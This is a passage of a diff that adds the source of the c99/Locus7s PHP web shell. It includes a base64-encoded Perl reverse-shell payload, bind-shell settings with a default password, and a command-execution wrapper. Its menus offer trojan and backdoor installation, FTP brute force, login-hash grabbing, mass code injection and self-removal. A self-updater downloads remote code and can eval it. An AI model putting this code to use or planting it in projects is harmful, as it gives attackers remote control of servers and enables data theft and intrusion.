+ 'txt'=>array('txt','conf','bat','sh','js','bak','doc','log','sfc','cfg','htaccess','passwd','shadow'),
+ 'exe'=>array('sh','install','bat','cmd'),
+ 'ini'=>array('ini','inf'),
+ 'code'=>array('php','phtml','php3','php4','inc','tcl','h','c','cpp','py','cgi','pl'),
+ 'img'=>array('gif','png','jpeg','jfif','jpg','jpe','bmp','ico','tif','tiff','avi','mpg','mpeg'),
+ 'sdb'=>array('sdb'),
+ 'phpsess'=>array('sess'),
+ 'download'=>array('exe','com','pif','src','lnk','zip','rar','gz','tar')
+);
+
+// Registered executable file-types. 
+//  array( 
+//   string "command{i}"=>array("ext1","ext2","ext3",...), 
+//   ... 
+//  ) 
+//   {command}: %f% = filename 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} 
+$dizin = str_replace("\\\\","\\",$dizin); 
+$dizinispd = htmlspecialchars($dizin); 
+/*dizin*/ 
+$real = realpath($dizinispd); 
+$path = basename ($PHP_SELF); 
+function dosyayicek($link,$file) 
+{ 
+   $fp = @fopen($link,'r');
+   while(!feof($fp))
+   { 
+       $cont.= fread($fp,1024); 
+   } 
+   fclose($fp); 
+
+   $fp2 = @fopen($file,"w"); 
+   fwrite($fp2,$cont); 
+   fclose($fp2); 
+} 
+
+
+
+
+$exeftypes  = array( 
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"), 
+ "perl %f%" => array("pl","cgi") 
+); 
+
+/* Highlighted files. 
+  array( 
+   i=>array({regexp},{type},{opentag},{closetag},{break}) 
+   ... 
+  ) 
+  string {regexp} - regular exp. 
+  int {type}: 
+0 - files and folders (as default), 
+1 - files only, 2 - folders only 
+  string {opentag} - open html-tag, e.g. "<b>" (default) 
+  string {closetag} - close html-tag, e.g. "</b>" (default) 
+  bool {break} - if TRUE and found match then break 
+*/ 
+$regxp_highlight  = array( 
+  array(basename($_SERVER["PHP_SELF"]),1,'<font color=red>','</font>'), // example 
+  array("config.php",1), // example 
+  array("settings.php",1),
+  array("connect.php",1)
+); 
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. 
+ // array (i=>{letter} ...); string {letter} - letter of a drive 
+//$safemode_diskettes = range('a','z'); 
+$hexdump_lines = 8;// lines in hex preview file 
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line 
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd 
+
+$bindport_pass = 'c99';  // default password for binding 
+$bindport_port = '31373'; // default port for binding 
+$bc_port = '5992'; // default port for back-connect 
+$datapipe_localport = '8081'; // default port for datapipe 
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj 
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR 
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT 
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI 
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi 
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl 
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
+
+$sess_cookie = "c99shvars"; // Cookie-variable name 
+
+$usefsbuff = TRUE; //Buffer-function 
+$copy_unset = FALSE; //Remove copied files from buffer after pasting 
+
+//Quick launch 
+$quicklaunch = array( 
+ array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), 
+ array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), 
+ array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), 
+ array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), 
+ array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), 
+ array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), 
+ array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), 
+ array("<br><br><center><b>[String/Hash Tools]</b>",$surl."act=encoder&d=%d"),
+ array("<b>[Tools]</b>",$surl."act=tools&d=%d"), 
+ array("<b>[Processes]</b>",$surl."act=processes&d=%d"), 
+ array("<b>[FTP Brute Force]</b>",$surl."act=ftpquickbrute&d=%d"), 
+ array("<b>[System Information]</b>",$surl."act=security&d=%d"), 
+ array("<b>[SQL Shell]</b>",$surl."act=sql&d=%d"), 
+ array("<b>[Kernel Exploit Search]</b>",$millink),
+ array("<b>[Execute PHP Code]</b>",$surl."act=eval&d=%d"),
+ array("<b>[PHP Info]</b></center>",$surl."act=phpinfo&d=%d")
+);
+$quicklaunch2 = array(
+ array("<b><center>[Install Trojan/Backdoor]</b>",$surl.'act=trojan'),
+ array("<b>[Bind Shell Backdoor]</b>",$surl.'act=shbd'),
+ array("<b>[Back-Connection]</b>",$surl.'act=backc'),
+ array("<b>[Mass Code Injection]</b>",$surl.'act=massbrowsersploit'),
+ array("<b>[Exploits]</b>",$surl.'act=exploits'),
+ array("<b>[Grab Login Hashes]</b>",$surl.'act=grablogins'),
+ array("<b>[Suicide Script]</b></center>",$surl.'act=selfremove')
+); 
+
+//Highlight-code colors 
+$highlight_background = "#c0c0c0"; 
+$highlight_bg = "#FFFFFF"; 
+$highlight_comment = "#6A6A6A"; 
+$highlight_default = "#0000BB"; 
+$highlight_html = "#1300FF"; 
+$highlight_keyword = "#007700"; 
+$highlight_string = "#000000"; 
+
+@$f = $_REQUEST["f"]; 
+@extract($_REQUEST["c99shcook"]); 
+
+//END CONFIGURATION 
+
+
+// \/Next code isn't for editing\/ 
+/*function ex($cfe) 
+{ 
+ $res = ''; 
+ if (!empty($cfe)) 
+ { 
+  if(function_exists('exec')) 
+   {
+    @exec($cfe,$res); 
+    $res = join("\n",$res); 
+   } 
+  elseif(function_exists('shell_exec')) 
+   { 
+    $res = @shell_exec($cfe); 
+   } 
+  elseif(function_exists('system')) 
+   { 
+    @ob_start(); 
+    @system($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(function_exists('passthru')) 
+   { 
+    @ob_start(); 
+    @passthru($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(@is_resource($f = @popen($cfe,"r"))) 
+  { 
+   $res = ""; 
+   while(!@feof($f)) { $res .= @fread($f,1024); } 
+   @pclose($f); 
+  } 
+ } 
+ return $res; 
+}*/
+/*function which($pr) 
+{ 
+$path = ex("which $pr"); 
+if(!empty($path)) { return $path; } else { return $pr; } 
+} 
+
+function cf($fname,$text) 
+{ 
+ $w_file=@fopen($fname,"w") or err(0); 
+ if($w_file) 
+ { 
+ @fputs($w_file,@base64_decode($text)); 
+ @fclose($w_file); 
+ } 
+}*/ 
+/*function err($n,$txt='') 
+{ 
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=Verdana size=-2><div align=center><b>';     
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; 
+if(!empty($txt)) { echo " $txt"; } 
+echo '</b></div></font></td></tr></table>'; 
+return null; 
+}*/
+@set_time_limit(0); 
+$tmp = array(); 
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} 
+$s = "!^(".implode("|",$tmp).")$!i"; 
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://locus7s.com/\">x2300 Shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} 
+if (!empty($login)) 
+{ 
+ if (empty($md5_pass)) {$md5_pass = md5($pass);} 
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) 
+ { 
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} 
+  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); 
+  header("HTTP/1.0 401 Unauthorized"); 
+  exit($accessdeniedmess); 
+ } 
+} 
+if ($act != "img") 
+{ 
+$lastdir = realpath("."); 
+chdir($curdir); 
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} 
+$sess_data = unserialize($_COOKIE["$sess_cookie"]); 
+if (!is_array($sess_data)) {$sess_data = array();} 
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} 
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} 
+
+$disablefunc = @ini_get("disable_functions"); 
+if (!empty($disablefunc)) 
+{ 
+ $disablefunc = str_replace(" ","",$disablefunc); 
+ $disablefunc = explode(",",$disablefunc); 
+} 
+
+if (!function_exists("c99_buff_prepare")) 
+{ 
+function c99_buff_prepare() 
+{ 
+ global $sess_data; 
+ global $act; 
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ $sess_data["copy"] = array_unique($sess_data["copy"]); 
+ $sess_data["cut"] = array_unique($sess_data["cut"]); 
+ sort($sess_data["copy"]); 
+ sort($sess_data["cut"]); 
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} 
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} 
+} 
+} 
+c99_buff_prepare(); 
+
+if (!function_exists("c99_sess_put")) 
+{ 
+function c99_sess_put($data) 
+{ 
+ global $sess_cookie; 
+ global $sess_data; 
+ c99_buff_prepare(); 
+ $sess_data = $data; 
+ $data = serialize($data); 
+ setcookie($sess_cookie,$data); 
+} 
+} 
+foreach (array("sort","sql_sort") as $v) 
+{ 
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];} 
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];} 
+} 
+if ($sort_save) 
+{ 
+ if (!empty($sort)) {setcookie("sort",$sort);} 
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} 
+} 
+if (!function_exists("str2mini")) 
+{ 
+function str2mini($content,$len) 
+{ 
+ if (strlen($content) > $len) 
+ { 
+  $len = ceil($len/2) - 2; 
+  return substr($content, 0,$len)."...".substr($content,-$len); 
+ } 
+ else {return $content;} 
+} 
+} 
+if (!function_exists("view_size")) 
+{ 
+function view_size($size) 
+{ 
+ if (!is_numeric($size)) {return FALSE;} 
+ else 
+ { 
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
+  else {$size = $size . " B";} 
+  return $size; 
+ } 
+} 
+} 
+if (!function_exists("fs_copy_dir")) 
+{ 
+function fs_copy_dir($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_copy_obj")) 
+{ 
+function fs_copy_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));} 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_copy_dir($d,$t); 
+ } 
+ elseif (is_file($d)) {return copy($d,$t);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_move_dir")) 
+{ 
+function fs_move_dir($d,$t) 
+{ 
+ $h = opendir($d); 
+ if (!is_dir($t)) {mkdir($t);} 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   $ret = TRUE; 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_move_obj")) 
+{ 
+function fs_move_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_move_dir($d,$t); 
+ } 
+ elseif (is_file($d)) 
+ { 
+  if(copy($d,$t)) {return unlink($d);} 
+  else {unlink($t); return FALSE;} 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_rmdir")) 
+{ 
+function fs_rmdir($d) 
+{ 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.$o)) {unlink($d.$o);} 
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} 
+  } 
+ } 
+ closedir($h); 
+ rmdir($d); 
+ return !is_dir($d); 
+} 
+} 
+if (!function_exists("fs_rmobj")) 
+{ 
+function fs_rmobj($o) 
+{ 
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); 
+ if (is_dir($o))
+ { 
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} 
+  return fs_rmdir($o); 
+ } 
+ elseif (is_file($o)) {return unlink(html_entity_decode($o));} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("myshellexec")) 
+{ 
+function myshellexec($cmd) 
+{ 
+ global $disablefunc; 
+ $result = ""; 
+ if (!empty($cmd)) 
+ { 
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} 
+  elseif (($result = `$cmd`) !== FALSE) {} 
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_resource($fp = popen($cmd,"r"))) 
+  { 
+   $result = ""; 
+   while(!feof($fp)) {$result .= fread($fp,1024);} 
+   pclose($fp); 
+  } 
+ } 
+ return $result; 
+} 
+} 
+if (!function_exists('tabsort')) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} 
+if (!function_exists('view_perms')) 
+{ 
+function view_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$type = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";} 
+ else {$type = "?";} 
+
+ $owner["read"] = ($mode & 00400)?"r":"-"; 
+ $owner["write"] = ($mode & 00200)?"w":"-"; 
+ $owner["execute"] = ($mode & 00100)?"x":"-"; 
+ $group["read"] = ($mode & 00040)?"r":"-"; 
+ $group["write"] = ($mode & 00020)?"w":"-"; 
+ $group["execute"] = ($mode & 00010)?"x":"-"; 
+ $world["read"] = ($mode & 00004)?"r":"-"; 
+ $world["write"] = ($mode & 00002)? "w":"-"; 
+ $world["execute"] = ($mode & 00001)?"x":"-"; 
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} 
+
+ return $type.join("",$owner).join("",$group).join("",$world); 
+} 
+} 
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} 
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} 
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} 
+if (!function_exists("parse_perms")) 
+{ 
+function parse_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$t = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";} 
+ else {$t = "?";} 
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; 
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; 
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; 
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); 
+} 
+} 
+if (!function_exists("parsesort")) 
+{ 
+function parsesort($sort) 
+{ 
+ $one = intval($sort); 
+ $second = substr($sort,-1); 
+ if ($second != "d") {$second = "a";} 
+ return array($one,$second); 
+} 
+} 
+if (!function_exists("view_perms_color")) 
+{ 
+function view_perms_color($o) 
+{ 
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} 
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} 
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";} 
+} 
+} 
+if (!function_exists("c99getsource")) 
+{ 
+function c99getsource($fn) 
+{ 
+ global $c99sh_sourcesurl; 
+ $array = array( 
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", 
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt", 
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", 
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt", 
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", 
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", 
+ ); 
+ $name = $array[$fn]; 
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99sh_getupdate")) 
+{ 
+function c99sh_getupdate($update = TRUE) 
+{ 
+ $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; 
+ $data = @file_get_contents($url); 
+ if (!$data) {return "Can't connect to update-server!";} 
+ else 
+ { 
+  $data = ltrim($data); 
+  $string = substr($data,3,ord($data{2})); 
+  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} 
+  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} 
+  if ($data{0} == "\x99" and $data{1} == "\x03") 
+  { 
+   $string = explode("\x01",$string); 
+   if ($update) 
+   { 
+    $confvars = array(); 
+    $sourceurl = $string[0]; 
+    $source = file_get_contents($sourceurl); 
+    if (!$source) {return "Can't fetch update!";} 
+    else 
+    { 
+     $fp = fopen(__FILE__,"w"); 
+     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} 
+     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} 
+    } 
+   } 
+   else {return "New version are available: ".$string[1];} 
+  } 
+  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} 
+  else {return "Error in protocol: segmentation failed! (".$data.") ";} 
+ } 
+} 
+} 
+if (!function_exists("mysql_dump")) 
+{ 
+function mysql_dump($set) 
+{ 
+ global $shver; 
+ $sock = $set["sock"]; 
+ $db = $set["db"]; 
+ $print = $set["print"]; 
+ $nl2br = $set["nl2br"]; 
+ $file = $set["file"]; 
+ $add_drop = $set["add_drop"]; 
+ $tabs = $set["tabs"]; 
+ $onlytabs = $set["onlytabs"]; 
+ $ret = array(); 
+ $ret["err"] = array(); 
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} 
+ if (empty($db)) {$db = "db";} 
+ if (empty($print)) {$print = 0;} 
+ if (empty($nl2br)) {$nl2br = 0;} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (empty($file)) 
+ { 
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; 
+ } 
+ if (!is_array($tabs)) {$tabs = array();} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (sizeof($tabs) == 0) 
+ { 
+  // retrive tables-list 
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock); 
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} 
+ } 
+ $out = "# Dumped by Locous7Shell.SQL v. ".$shver." 
+# Home page: http://www.Locus7s.com 
+# 
+# Host settings: 
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." 
+# Date: ".date("d.m.Y H:i:s")." 
+# DB: \"".$db."\" 
+#--------------------------------------------------------- 
+"; 
+ $c = count($onlytabs); 
+ foreach($tabs as $tab) 
+ { 
+  if ((in_array($tab,$onlytabs)) or (!$c)) 
+  { 
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} 
+   // recieve query for create table structure 
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); 
+   if (!$res) {$ret["err"][] = mysql_smarterror();} 
+   else 
+   { 
+    $row = mysql_fetch_row($res); 
+    $out .= $row["1"].";\n\n"; 
+    // recieve table variables 
+    $res = mysql_query("SELECT * FROM `$tab`", $sock); 
+    if (mysql_num_rows($res) > 0) 
+    { 
+     while ($row = mysql_fetch_assoc($res)) 
+     { 
+      $keys = implode("`, `", array_keys($row)); 
+      $values = array_values($row); 
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+      $values = implode("', '", $values); 
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+      $out .= $sql; 
+     } 
+    } 
+   } 
+  } 
+ } 
+ $out .= "#---------------------------------------------------------------------------------\n\n"; 
+ if ($file) 
+ { 
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret["err"][] = 2;} 
+  else 
+  { 
+   fwrite ($fp, $out); 
+   fclose ($fp); 
+  } 
+ } 
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} 
+ return $out; 
+} 
+} 
+if (!function_exists("mysql_buildwhere")) 
+{ 
+function mysql_buildwhere($array,$sep=" and",$functs=array()) 
+{ 
+ if (!is_array($array)) {$array = array();} 
+ $result = ""; 
+ foreach($array as $k=>$v) 
+ { 
+  $value = ""; 
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";} 
+  $value .= "'".addslashes($v)."'"; 
+  if (!empty($functs[$k])) {$value .= ")";} 
+  $result .= "`".$k."` = ".$value.$sep; 
+ } 
+ $result = substr($result,0,strlen($result)-strlen($sep)); 
+ return $result; 
+} 
+} 
+if (!function_exists("mysql_fetch_all")) 
+{ 
+function mysql_fetch_all($query,$sock) 
+{ 
+ if ($sock) {$result = mysql_query($query,$sock);} 
+ else {$result = mysql_query($query);} 
+ $array = array(); 
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;} 
+ mysql_free_result($result); 
+ return $array; 
+} 
+} 
+if (!function_exists("mysql_smarterror")) 
+{ 
+function mysql_smarterror($type,$sock) 
+{ 
+ if ($sock) {$error = mysql_error($sock);} 
+ else {$error = mysql_error();} 
+ $error = htmlspecialchars($error); 
+ return $error; 
+} 
+} 
+if (!function_exists("mysql_query_form")) 
+{ 
+function mysql_query_form() 
+{ 
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; 
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+ if ((!$submit) or ($sql_act)) 
+ { 
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; 
+  if ($tbl_struct) 
+  { 
+   echo "<td valign=\"top\"><b>Fields:</b><br>"; 
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} 
+   echo "</td></tr></table>"; 
+  } 
+ } 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} 
+} 
+} 
+if (!function_exists("mysql_create_db")) 
+{ 
+function mysql_create_db($db,$sock="") 
+{ 
+ $sql = "CREATE DATABASE `".addslashes($db)."`;"; 
+ if ($sock) {return mysql_query($sql,$sock);} 
+ else {return mysql_query($sql);} 
+} 
+} 
+if (!function_exists("mysql_query_parse")) 
+{ 
+function mysql_query_parse($query) 
+{ 
+ $query = trim($query); 
+ $arr = explode (" ",$query); 
+ /*array array() 
+ { 
+  "METHOD"=>array(output_type), 
+  "METHOD1"... 
+  ... 
+ } 
+ if output_type == 0, no output, 
+ if output_type == 1, no output if no error 
+ if output_type == 2, output without control-buttons 
+ if output_type == 3, output with control-buttons 
+ */ 
+ $types = array( 
+  "SELECT"=>array(3,1), 
+  "SHOW"=>array(2,1), 
+  "DELETE"=>array(1), 
+  "DROP"=>array(1) 
+ ); 
+ $result = array(); 
+ $op = strtoupper($arr[0]); 
+ if (is_array($types[$op])) 
+ { 
+  $result["propertions"] = $types[$op]; 
+  $result["query"]  = $query; 
+  if ($types[$op] == 2) 
+  { 
+   foreach($arr as $k=>$v) 
+   { 
+    if (strtoupper($v) == "LIMIT") 
+    { 
